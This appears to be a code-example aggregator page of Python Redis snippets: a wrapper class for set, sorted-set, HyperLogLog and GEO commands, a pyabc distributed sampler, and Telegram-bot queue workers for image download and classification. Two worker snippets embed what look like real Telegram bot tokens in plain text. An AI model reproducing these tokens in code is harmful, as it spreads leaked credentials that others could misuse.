        time complexity O(N), N being the total number of members in all the given sets
        Return the members of the difference of the given sets.
        """
        return self._redis.sdiff(key, *args)

    @format_args()
    def sdiffstore(self, dest, keys, *args):
        """
        time complexity O(N), N being the total number of members in all the given sets
        Compute the difference, store it in the set dest, and return the number of members in the result
        """
        return self._redis.sdiffstore(dest, keys, *args)

    @format_args()
    def sinter(self, key, *args):
        """
        time complexity O(N * M), N being the cardinality of the smallest given set
        and M the number of given sets.
        Return the members of the intersection.
        """
        return self._redis.sinter(key, *args)

    @format_args()
    def sinterstore(self, dest, keys, *args):
        """
        time complexity O(N), N being the total number of members in all the given sets
        Compute the intersection, store it in the set dest, and return the number of members in the result
        """
        return self._redis.sinterstore(dest, keys, *args)

    @format_key()
    def sismember(self, key, name):
        """
        time complexity O(1)
        Check whether name is a member of the set at key
        """
        return self._redis.sismember(key, name)

    @format_key()
    def smembers(self, key):
        """
        time complexity O(n)
        Return all the members of the set
        """
        return self._redis.smembers(key)

    @format_two_key()
    def smove(self, src, dst, value):
        """
        time complexity O(1)
        Atomically move value from the set src into the set dst
        """
        return self._redis.smove(src, dst, value)

    @format_key()
    def spop(self, key, count=None):
        """
        time complexity O(n)
        Remove and return one random member by default, or count members if count is given
        """
        return self._redis.spop(key, count)

    @format_key()
    def srandmember(self, key, number=None):
        """
        time complexity O(n)
        Return one random member by default, or number members if given, without removing them
        """
        return self._redis.srandmember(key, number)

    @format_key()
    def srem(self, key, *values):
        """
        time complexity O(n), n being the number of values
        Remove the given values from the set at key
        """
        return self._redis.srem(key, *values)

    @format_args()
    def sunion(self, keys, *args):
        """
        time complexity O(N), N being the total number of members in all the given sets
        Return the union of the given sets
        """
        return self._redis.sunion(keys, *args)

    @format_args()
    def sunionstore(self, dest, keys, *args):
        """
        time complexity O(N), N being the total number of members in all the given sets.
        Compute the union and store it in dest
        """
        return self._redis.sunionstore(dest, keys, *args)

    @format_key()
    def sscan(self, key, cursor=0, match=None, count=None):
        """
        time complexity O(1)
        Same as scan, but iterates over a set
        """
        return self._redis.sscan(key, cursor, match, count)
# {
    """==================================set-end=================================="""

    """===============================SortedSet-start============================="""
# }
    @format_key()
    def zadd(self, key, mapping, nx=False, xx=False, ch=False, incr=False):
        """
        time complexity O(M*log(N)), N being the cardinality of the sorted set and
        M the number of new members successfully added.
        Arguments:
            mapping(dict): {value: score}
            xx(bool): only update existing members, never add new ones.
            nx(bool): never update existing members, only add new ones.
            ch(bool): change the return value to the total number of members changed
                      (CH stands for "changed"): changed means newly added members plus
                      existing members whose score was updated, so members specified
                      with a score they already have are not counted.
                      Note: normally ZADD only counts newly added members.
            incr(bool): with this option ZADD behaves like ZINCRBY and increments
                      the member's score.
        Returns:
            result(int): the number of members successfully added
        """
        if self.cluster_flag:
            return self._redis.zadd(key, **mapping)
        return self._redis.zadd(key, mapping, nx, xx, ch, incr)
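
    # Usage sketch (hypothetical key; mapping maps member -> score):
    #   conn = RedisConn()
    #   conn.zadd('rank', {'alice': 10, 'bob': 20})         # add two members -> 2
    #   conn.zadd('rank', {'alice': 15}, xx=True, ch=True)  # update only, count changes -> 1
    #   conn.zadd('rank', {'alice': 1}, incr=True)          # behaves like ZINCRBY -> 16.0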

    @format_key()
    def zcard(self, key):
        """
        time complexity O(1)
        Return the cardinality of the sorted set
        """
        return self._redis.zcard(key)

    @format_key()
    def zcount(self, key, minz, maxz):
        """
        time complexity O(log(N)), N being the cardinality of the sorted set.
        Return the number of members with a score between minz and maxz
        """
        return self._redis.zcount(key, minz, maxz)

    @format_key()
    def zincrby(self, key, amount, value):
        """
        time complexity O(log(N)), N being the cardinality of the sorted set.
        amount may be negative
        """
        if self.cluster_flag:
            return self._redis.zincrby(key, value, amount)
        return self._redis.zincrby(key, amount, value)

    @format_key_keys()
    def zinterstore(self, dest, keys, aggregate=None):
        """
        time complexity O(N*K)+O(M*log(M)), N being the cardinality of the smallest
        input sorted set, K the number of input sets and M the cardinality of the result.
        Compute the intersection, combine scores according to aggregate (sum by
        default) and store the result in dest.
        Arguments:
            aggregate(str): sum, min or max
        Returns the number of members in the new sorted set
        """
        return self._redis.zinterstore(dest, keys, aggregate)

    @format_key()
    def zrange(self, key, start, end, desc=False, withscores=False,
               score_cast_func=float):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the cardinality of the result.
        Arguments:
            start: start index into the sorted set (an index, not a score)
            end: end index into the sorted set (an index, not a score)
            desc: sort order; by default members are ordered by ascending score
            withscores: also return each member's score; by default only the values are returned
            score_cast_func: function used to cast the returned scores
        """
        return self._redis.zrange(key, start, end, desc, withscores, score_cast_func)

    @format_key()
    def zrevrange(self, key, start, end, withscores=False, score_cast_func=float):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the cardinality of the result.
        Arguments:
            start: start index into the sorted set (an index, not a score)
            end: end index into the sorted set (an index, not a score)
            withscores: also return each member's score; by default only the values are returned
            score_cast_func: function used to cast the returned scores
        """
        return self._redis.zrevrange(key, start, end, withscores, score_cast_func)

    @format_key()
    def zrangebyscore(self, key, minz, maxz, start=None, num=None, withscores=False, score_cast_func=float):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the cardinality of the result.
        Members are returned ordered by ascending score (smallest to largest).
        """
        return self._redis.zrangebyscore(key, minz, maxz, start, num, withscores, score_cast_func)

    @format_key()
    def zrevrangebyscore(self, key, minz, maxz, start=None, num=None, withscores=False, score_cast_func=float):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the cardinality of the result.
        Members are returned ordered by descending score (largest to smallest).
        """
        return self._redis.zrevrangebyscore(key, minz, maxz, start, num, withscores, score_cast_func)

    @format_key()
    def zrangebylex(self, key, minz, maxz, start=None, num=None):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the cardinality of the result.
        Members are returned in ascending lexicographical order of their values.
        """
        return self._redis.zrangebylex(key, minz, maxz, start, num)

    @format_key()
    def zrevrangebylex(self, key, minz, maxz, start=None, num=None):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the cardinality of the result.
        Members are returned in descending lexicographical order of their values.
        """
        return self._redis.zrevrangebylex(key, minz, maxz, start, num)

    @format_key()
    def zrank(self, key, value):
        """
        time complexity O(log(N))
        Return the 0-based rank of value in the sorted set (ordered by ascending score)
        """
        return self._redis.zrank(key, value)

    @format_key()
    def zrevrank(self, key, value):
        """
        time complexity O(log(N))
        Return the 0-based rank of value in the sorted set ordered by descending score
        """
        return self._redis.zrevrank(key, value)

    @format_key()
    def zrem(self, key, *values):
        """
        time complexity O(M*log(N)), N being the cardinality of the sorted set
        and M the number of members removed
        Remove one or more members from the sorted set
        """
        return self._redis.zrem(key, *values)

    @format_key()
    def zremrangebylex(self, key, minz, maxz):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the number of members removed.
        Remove the members in the given lexicographical range
        """
        return self._redis.zremrangebylex(key, minz, maxz)

    @format_key()
    def zremrangebyrank(self, key, minz, maxz):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the number of members removed.
        Remove the members in the given rank range
        """
        return self._redis.zremrangebyrank(key, minz, maxz)

    @format_key()
    def zremrangebyscore(self, key, minz, maxz):
        """
        time complexity O(log(N)+M), N being the cardinality of the sorted set
        and M the number of members removed.
        Remove the members in the given score range
        """
        return self._redis.zremrangebyscore(key, minz, maxz)

    @format_key()
    def zscore(self, key, value):
        """
        time complexity O(log(N))
        Return the score of value in the sorted set
        """
        return self._redis.zscore(key, value)

    @format_key_keys()
    def zunionstore(self, dest, keys, aggregate=None):
        """
        time complexity O(N)+O(M*log(M)), N being the total cardinality of the
        input sorted sets and M the cardinality of the result.
        Compute the union and store it in dest
        """
        return self._redis.zunionstore(dest, keys, aggregate)

    @format_key()
    def zscan(self, key, cursor=0, match=None, count=None, score_cast_func=float):
        """
        time complexity O(1)
        Same as scan, but iterates over a sorted set
        """
        return self._redis.zscan(key, cursor, match, count, score_cast_func)

    def zlexcount(self, key, minz, maxz):
        """
        time complexity O(log(N)), N being the number of elements in the sorted set.
        In lex ranges '-' means negative infinity and '+' positive infinity;
        '[' makes a bound inclusive and '(' exclusive, e.g. '[a', '(c'.
        """
        return self._redis.zlexcount(key, minz, maxz)
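
    # Usage sketch for lex ranges (hypothetical key): '-' and '+' are the
    # infinities, '[' makes a bound inclusive and '(' exclusive.
    #   conn = RedisConn()
    #   conn.zlexcount('myzset', '-', '+')    # count all members
    #   conn.zlexcount('myzset', '[a', '(c')  # a <= member < c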
# {
    """===============================SortedSet-end================================="""
    """===============================HyperLogLog-start==============================="""
# }
    @format_key()
    def pfadd(self, key, *values):
        """
        time complexity O(n)
        """
        return self._redis.pfadd(key, *values)

    @format_args()
    def pfcount(self, *sources):
        """
        time complexity O(1)
        Return the approximate cardinality of the given keys
        """
        return self._redis.pfcount(*sources)

    @format_args()
    def pfmerge(self, dest, *sources):
        """
        time complexity O(N), N being the number of HyperLogLogs merged; note the
        constant cost of this command is fairly high
        Merge the given HyperLogLogs into dest
        """
        return self._redis.pfmerge(dest, *sources)
# {
    """===============================HyperLogLog-end================================="""

    """==================================GEO-start===================================="""
# }
    @format_key()
    def geoadd(self, key, *values):
        """
        time complexity O(log(N)) per element added, N being the number of location elements stored at the key.
        """
        return self._redis.geoadd(key, *values)

    @format_key()
    def geopos(self, key, *values):
        """
        time complexity O(log(N))
        Return the positions (longitude and latitude) of all the given members of the key.
        """
        return self._redis.geopos(key, *values)

    @format_key()
    def geohash(self, key, *values):
        """
        time complexity O(log(N))
        Return geohash strings whose positions correspond one-to-one to the given members
        """
        return self._redis.geohash(key, *values)

    @format_key()
    def geodist(self, key, place1, place2, unit=None):
        """
        time complexity O(log(N))
        Return the distance between the two given members.
        Argument:
            unit: m (meters), km (kilometers), mi (miles), ft (feet)
        """
        return self._redis.geodist(key, place1, place2, unit)

    @format_key()
    def georadius(self, key, longitude, latitude, radius, unit=None,
                  withdist=False, withcoord=False, withhash=False, count=None,
                  sort=None, store=None, store_dist=None):
        """
        time complexity O(N+log(M)), N being the number of elements inside the given
        radius and M the number of elements returned.
        Using the given longitude/latitude as the center, return every location
        element of the key whose distance from the center does not exceed the
        given maximum distance.
        Argument:
            longitude: longitude of the center
            latitude: latitude of the center
            radius: maximum distance
            unit: distance unit
            withdist: also return each element's distance from the center, in the
                      same unit as the given radius.
            withcoord: also return each element's longitude and latitude
            withhash: also return the raw geohash-encoded sorted-set score of each
                      element as a 52-bit signed integer. Mainly useful for low-level
                      applications or debugging; rarely needed in practice.
            sort: sort by distance from the center, ASC or DESC
            count: return only the first count elements
            store: store the result under this key
            store_dist: store the member names and their distances
        Return:
            list(list)
            [['Foshan', 109.4922], ['Guangzhou', 105.8065]]
        """
        return self._redis.georadius(key, longitude, latitude, radius, unit, withdist, withcoord,
                                     withhash, count, sort, store, store_dist)
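
    # Usage sketch (hypothetical key, approximate coordinates):
    #   conn = RedisConn()
    #   conn.geoadd('cities', 113.12, 23.03, 'Foshan', 113.26, 23.13, 'Guangzhou')
    #   conn.georadius('cities', 113.20, 23.10, 50, unit='km',
    #                  withdist=True, sort='ASC')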

    @format_key()
    def georadiusbymember(self, key, member, radius, unit=None,
                          withdist=False, withcoord=False, withhash=False, count=None,
                          sort=None, store=None, store_dist=None):
        """
        time complexity O(N+log(M)), N being the number of elements inside the given
        radius and M the number of elements returned.
        Like georadius, but the center is an existing member of the key instead of
        a longitude/latitude pair.
        Argument:
            member: the member to use as the center
            radius: maximum distance
            unit: distance unit
            withdist: also return each element's distance from the center, in the same unit as the given radius.
            withcoord: also return each element's longitude and latitude
            withhash: also return the raw geohash-encoded sorted-set score of each element as a 52-bit signed integer. Mainly useful for low-level applications or debugging.
            sort: sort by distance from the center, ASC or DESC
            count: return only the first count elements
            store: store the result under this key
            store_dist: store the member names and their distances
        Return:
            list(list)
            [['Foshan', 109.4922], ['Guangzhou', 105.8065]]
        """
        return self._redis.georadiusbymember(key, member, radius, unit, withdist, withcoord,
                                             withhash, count, sort, store, store_dist)

# {
    """==================================GEO-end======================================"""
Beispiel #29
0
class RedisEvalParallelSampler(Sampler):
    """
    Redis based low latency sampler.
    This sampler is well performing in distributed environments.
    It is usually faster than the
    :class:`pyabc.sampler.DaskDistributedSampler` for
    short model evaluation runtimes. The longer the model evaluation times,
    the less the advantage becomes. It requires a running Redis server as
    broker.

    This sampler requires workers to be started via the command
    ``abc-redis-worker``.
    An example call might look like
    ``abc-redis-worker --host=123.456.789.123 --runtime=2h``
    to connect to a Redis server on IP ``123.456.789.123`` and to terminate
    the worker after it finishes the first population that ends more than 2 hours
    after worker start, so the actual runtime may be longer than 2h.
    See ``abc-redis-worker --help`` for its options.

    Use the command ``abc-redis-manager`` to retrieve info and stop the running
    workers.

    Start as many workers as you wish. Workers can be dynamically added
    during the ABC run.

    Parameters
    ----------

    host: str, optional
        IP address or name of the Redis server.
        Default is "localhost".

    port: int, optional
        Port of the Redis server.
        Default is 6379.

    batch_size: int, optional
        Number of model evaluations the workers perform before contacting
        the Redis server. Defaults to 1. Increase this value if model
        evaluation times are short or the number of workers is large
        to reduce communication overhead.
    """
    def __init__(self, host="localhost", port=6379, batch_size=1):
        super().__init__()
        logger.debug(f"Redis sampler: host={host} port={port}")
        # handles the connection to the redis-server
        self.redis = StrictRedis(host=host, port=port)
        self.batch_size = batch_size

    def n_worker(self):
        """
        Get the number of connected workers.

        Returns
        -------

        Number of workers connected.
        """
        return self.redis.pubsub_numsub(MSG)[0][-1]

    def sample_until_n_accepted(self, n, simulate_one, all_accepted=False):
        # open pipeline
        pipeline = self.redis.pipeline()

        # write initial values to pipeline
        self.redis.set(SSA,
                       cloudpickle.dumps((simulate_one, self.sample_factory)))
        pipeline.set(N_EVAL, 0)
        pipeline.set(N_ACC, 0)
        pipeline.set(N_REQ, n)
        pipeline.set(ALL_ACCEPTED, int(all_accepted))  # encode as int
        pipeline.set(N_WORKER, 0)
        pipeline.set(BATCH_SIZE, self.batch_size)
        # delete previous results
        pipeline.delete(QUEUE)
        # execute all commands
        pipeline.execute()

        id_results = []

        # publish start message
        self.redis.publish(MSG, START)

        # wait until n acceptances
        while len(id_results) < n:
            # pop result from queue, block until one is available
            dump = self.redis.blpop(QUEUE)[1]
            # extract pickled object
            particle_with_id = pickle.loads(dump)
            # append to collected results
            id_results.append(particle_with_id)

        # wait until all workers done
        while int(self.redis.get(N_WORKER).decode()) > 0:
            sleep(SLEEP_TIME)

        # make sure all results are collected
        while self.redis.llen(QUEUE) > 0:
            id_results.append(pickle.loads(self.redis.blpop(QUEUE)[1]))

        # set total number of evaluations
        self.nr_evaluations_ = int(self.redis.get(N_EVAL).decode())

        # delete keys from pipeline
        pipeline = self.redis.pipeline()
        pipeline.delete(SSA)
        pipeline.delete(N_EVAL)
        pipeline.delete(N_ACC)
        pipeline.delete(N_REQ)
        pipeline.delete(ALL_ACCEPTED)
        pipeline.delete(BATCH_SIZE)
        pipeline.execute()

        # avoid bias toward short running evaluations (for
        # dynamic scheduling)
        id_results.sort(key=lambda x: x[0])
        id_results = id_results[:n]

        results = [res[1] for res in id_results]

        # create 1 to-be-returned sample from results
        sample = self._create_empty_sample()
        for j in range(n):
            sample += results[j]

        return sample
Beispiel #30
0
from redis import StrictRedis
import json
import base64
from io import BytesIO
from PIL import Image
import requests
import telepot



r = StrictRedis(host='localhost', port=6379)
while True:
    item = r.blpop('download')
#     print(item[1])
    item = item[1].decode("utf-8")
    data = json.loads(item)
    chat_id = data['chat_id']
    image_file = "{}.png".format(chat_id)

    if 'file_id' in data:
        file_id = data['file_id']
        bot = telepot.Bot("685559472:AAFAm4QE2iVliFhb21rUnLcfWSZ1jMbf_3U")
        bot.download_file(file_id, image_file)
    else:
        content = data['url']
        image_data = requests.get(content).content
        with open(image_file, 'wb') as outfile:
            outfile.write(image_data)

    image = Image.open(image_file)
    buffered = BytesIO()
Beispiel #31
0
BUCKET_NAME = "elfin"
Proxy = {"http": "http://127.0.0.1:48657"}

qiniu = Auth(ACCESS_KEY, SECRET_KEY)

def get_name():
    name = str(time())
    return name.replace(".", "")

def upload_media(media):
    key = get_name()
    data = media
    token = qiniu.upload_token(BUCKET_NAME)
    return put_data(token, key, data)

if __name__ == "__main__":
    while 1:
        media_url = redis.blpop("media_url")
        if media_url:
            media = get(url=media_url[1], proxies=Proxy)
            try:
                ret, info = upload_media(media.content)
            except Exception as e:
                # push the URL back so the job can be retried
                redis.rpush("media_url", media_url[1])
                logbook.error(e)
            else:
                media_name = ret["key"]
                redis.zadd("image_name", int(media_name), int(media_name))
            finally:
                logbook.info("work on {}".format(media_url))
Beispiel #32
0
from redis import StrictRedis

r = StrictRedis(host='localhost', port=6379)

while True:
    item = r.blpop('channel_01')
    print(item)
Beispiel #33
0
from redis import StrictRedis
from PIL import Image
import json
import wget
from io import BytesIO
import base64
import telepot

r = StrictRedis(host='localhost', port=6379)
bot = telepot.Bot("735092509:AAHMWTa-ZCK8npB5r4FnvMfHW7wTsYLHwAo")

while True:
    item = json.loads(r.blpop('download')[1].decode('utf-8'))
    # print(item)
    print('An item received')
    chat_id = item['chat_id']
    if 'file_id' in item:
        bot.download_file(item['file_id'], 'file.png')
        image = Image.open('file.png')
    elif 'url' in item:
        filename = wget.download(item['url'])
        image = Image.open(filename)
    buffered = BytesIO()
    image.save(buffered, format="PNG")
    encoded_image = base64.b64encode(buffered.getvalue()).decode()
    data = {'chat_id':chat_id, 'image': encoded_image}
    message = json.dumps(data)
    r.rpush('image', message.encode("utf-8"))
Beispiel #34
0
# assign a value to the given index of the list
redis.lset('list', 0, -1)



# remove occurrences of the given value from the list, up to the given count
redis.lrem('list', 2, -1) # 2 is the count, -1 the value to remove


# remove the first element of the list and return it
print(redis.lpop('list'))


# like lpop, but blocks and waits if the list is empty
print(redis.blpop('list'))


# the counterpart of blpop: removes the tail element, blocking if the list is empty
print(redis.brpop('list'))


# pop the tail element of one list and push it onto the head of another
redis.rpoplpush('list', 'list2')


# ---------- set operations -----------
# elements of a set are never duplicated

# add elements to a set, creating the key if it does not exist;
# the first argument is the key, the rest are values
redis.sadd('tags', 'Book', 'Tea', 'Coffee')
Beispiel #35
0
    predictions.sort(reverse=True)
    result = []
    for score, label in predictions[:5]:
        # print(label, score)
        entry = {"label": label, "score": float(score)}
        result.append(entry)
    return result


r = StrictRedis(host='localhost', port=6379)
content = requests.get(
    "https://s3.amazonaws.com/deep-learning-models/image-models/imagenet_class_index.json"
).text
labels = json.loads(content)

while True:

    item = json.loads(r.blpop('image')[1].decode('utf-8'))
    print('An item received')
    chat_id = item['chat_id']
    image_data = base64.b64decode(item['image'])
    img_path = 'predict.png'
    with open(img_path, 'wb') as outfile:
        outfile.write(image_data)
    im = Image.open(img_path)
    pred_result = predict_image(im, labels)
    data = {'predictions': pred_result, 'chat_id': chat_id}
    message = json.dumps(data)
    r.rpush('prediction', message.encode("utf-8"))
    # print(message)